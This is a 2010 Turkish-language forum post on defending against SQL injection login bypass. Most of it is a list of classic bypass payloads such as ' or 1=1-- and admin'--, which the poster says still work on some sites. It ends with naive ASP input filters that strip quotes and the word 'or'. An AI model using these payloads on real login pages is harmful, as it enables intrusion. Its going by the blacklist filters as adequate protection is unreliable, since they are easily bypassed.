axi-qenc
Üyelik tarihi : 31/08/10
Nerden : Nereye
Mesajlar : 12
Aldığı Rep Sayısı : 6
 |  Konu: Bypass Korunma Yolları  Çarş. 13 Ekim 2010, 19:41 | |
| admin’--
’ ’ or ’ 1=1 --
’ or ’ 1=1
’ or ’ 1
’ or ’
" or 0=0 --
or 0=0 --
or 0=0 #
" or 0=0 #
or 0=0 #
’ or ’x’=’x
" or "x"="x
’) or (’x’=’x
’ or 1=1--
" or 1=1--
or 1=1--
’ or a=a--
" or "a"="a
’) or (’a’=’a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi’ or 1=1 --
hi’ or ’a’=’a
hi’) or (’a’=’a
hi")or("a"="a
Bunlar SQL Injection İle Panele Giriş Yapan Kodlardır. Eğer Bunları Engellersek SQL İnjectioan Olmuyacaktır.Günümüzde Hala Bu Açıkları Yaratan Webmasterler Mevcut.Kırmızılar Güncel Olarak Kullanabildiklerimiz.
Bunları Zararsız Hale Getirmek İçin 2 Çeşit Yöntem Vardır.
1. Scripte Bu Kodu Yapıştırmak .
Kod:
pass= request.form("pass")
pass = Replace(pass,"’","’’")
pass = Replace(pass,"or","*")
pass = Replace(pass,"=","*")
2. Seçenek Bu En Güzel Kimin Yaptığını Görmek. Bunun İçinde Kod Aşağıdadır.
Kod: If Instr(pass, "or") Then Response.Redirect "ban.asp(değiştir.)" end if | |
|
